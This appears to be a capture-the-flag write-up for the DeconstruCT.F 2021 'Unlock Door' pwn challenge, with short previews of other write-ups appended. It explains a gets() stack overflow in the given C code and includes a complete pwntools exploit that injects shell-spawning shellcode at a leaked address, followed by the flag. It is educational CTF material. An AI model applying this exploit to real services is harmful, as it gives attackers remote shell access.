--- layout: post title: "DeconstruCT.F 2021 | PWN | Unlock Door" date: 2021-10-03 13:37:00 +0700 tags: [ctf, writeup] --- <figure> <img src="https://cdn.discordapp.com/attachments/874145963407720513/894206917239513118/Group.png"> </figure> #### PWN | UNLOCK_DOOR (379 points | 22 solves) Challenge Description: ``` Hello Agent, I apologize for the unusual time of this mission but this mission is takes high priority I have accidentally locked myself in my office and the password that I have set for my office door does not work I assume that one of the janitors have accidentally reset the password Your mission is to unlock my office door Unfortunately the program that unlocks the door is not exposed to the network but there is another record keeping program that is exposed to the network and runs on the same machine. The connection info for the record keeper and the source code is included below. nc overly.uniquename.xyz 2082 ``` Given a source code.<br> record_keeper.c: ```c #include<stdio.h> #include<string.h> void get_record() { printf("Enter record:"); char record[128] = ""; gets(record); } int main(int argc,char **argv) { get_record(); } ``` The source code provided have a buffer overflow vulnerability (caused by gets() function). But when I try to connect to the given service, the service has a different output with the source code provided: <img src="https://cdn.discordapp.com/attachments/874554128553095198/894596106917384192/unknown.png"> **Solution:** I assumed that we should take advantage of the leaked address, and immediately tried to generate shellcode and jump to that address. Because our input is accommodated only 128 bytes. So we need an offset of 128, to overwrite the RBP, and 136 to overwrite the saved rip. Exploit: ```python #!/usr/bin/env python3 # -*- coding: utf-8 -*- from pwn import * from os import path import sys # ==========================[ Information DIR = path.dirname(path.abspath(__file__)) EXECUTABLE = "/chall" TARGET = DIR + EXECUTABLE HOST, PORT = "overly.uniquename.xyz", 2082 REMOTE, LOCAL = False, False # ==========================[ Tools elf = ELF(TARGET) elfROP = ROP(elf) # ==========================[ Configuration context.update( arch=["i386", "amd64", "aarch64"][1], endian="little", os="linux", log_level = ['debug', 'info', 'warn'][2], terminal = ['tmux', 'split-window', '-h'], ) # ==========================[ Exploit def exploit(io, libc=null): if LOCAL==True: #raw_input("Fire GDB!") if len(sys.argv) > 1 and sys.argv[1] == "d": choosen_gdb = [ "source /home/mydata/tools/gdb/gdb-pwndbg/gdbinit.py", # 0 - pwndbg "source /home/mydata/tools/gdb/gdb-peda/peda.py", # 1 - peda "source /home/mydata/tools/gdb/gdb-gef/.gdbinit-gef.py" # 2 - gef ][0] cmd = choosen_gdb + """ """ gdb.attach(io, gdbscript=cmd) io.recvuntil("location:") LEAKED_ADDRESS = int(io.recvline().strip().decode(), 16) print("LEAKED_ADDRESS :", hex(LEAKED_ADDRESS)) p = b"" p += asm(shellcraft.sh()) p += b"\x90" * (136 - len(p)) p += p64(LEAKED_ADDRESS) io.sendline(p) io.sendline("echo 'SEKTE GADENG'") io.sendline("cat unlock_door.sh") # flag location io.interactive() if __name__ == "__main__": io, libc = null, null if args.REMOTE: REMOTE = True io = remote(HOST, PORT) # libc = ELF("___") else: LOCAL = True io = process( [TARGET, ], env={ # "LD_PRELOAD":DIR+"/___", # "LD_LIBRARY_PATH":DIR+"/___", }, ) # libc = ELF("___") exploit(io, libc) ``` <img src="https://cdn.discordapp.com/attachments/874554128553095198/894597189307875358/unknown.png"><br> FLAG : **dsc{0pEN_5E5Ame}**
Last changed by  
Sekte Gadeng
339

Read more

DeconstruCT.F 2021 | Forensic | Mike

Forensic | Mike (433 points | 11 solves) Challenge Description: Julia has come to you to ask for help. After spending too much time on his computer, Mike has gone insane, but no one knows why. Can you figure it out? Julia would really appreciate it. Here's how his desktop looked like. Weird how his system time doesn't change.. Wrap the flag that you find with dsc{<flag>}! We're given a file (desktop_wallpaper.png): Solution:

10/4/2021
DeconstruCT.F 2021 | OSINT | Dora the Explorer

OSINT | Dora the Explorer (474 points | 18 solves) Challenge Description: Hi, I am Dora the Explorer and I love exploring as you know ;) (after all 1+1=0), and I recently found this place which has an a very cool looking street art to it. Plus they posted about it on social media many a times. You all should see this too sometime!!! We're given a file (osint.jpg): Solution: View the given file and check the photo. If we look at the metadata there are locations that we can find.

10/4/2021
DeconstruCT.F 2021 | OSINT | AHF

OSINT | AHF (429 points | 11 solves) Challenge Description: We've been listening and we've heard this group can write decent code (ahem ahem), but what have they been listening to? We're given a file (team.pdf), which contains: Solution: The file provided is nothing strange, so we do a search for they team name (Team AtomHeartFather)

10/4/2021
DeconstruCT.F 2021 | OSINT | Flags...and Flags

OSINT | Flags...and Flags (250 points | 5 solves) Challenge Description: The Co-Founder Of Spike music loves flags, and he loves to hide them in plain sight. Find it! Solution: Do a search and find the account in instagram. We get two account,that is Neil Kavalakkat account and Rithik Jain account, who became the co-founder of spike. But there is nothing interesting in Neil Kavalakkat account, so after we realized in Rithik Jain's latest photo there is a qr code in his hand. Just decode the qr code and get the flag

10/4/2021
Read more from Sekte Gadeng
Published on HackMD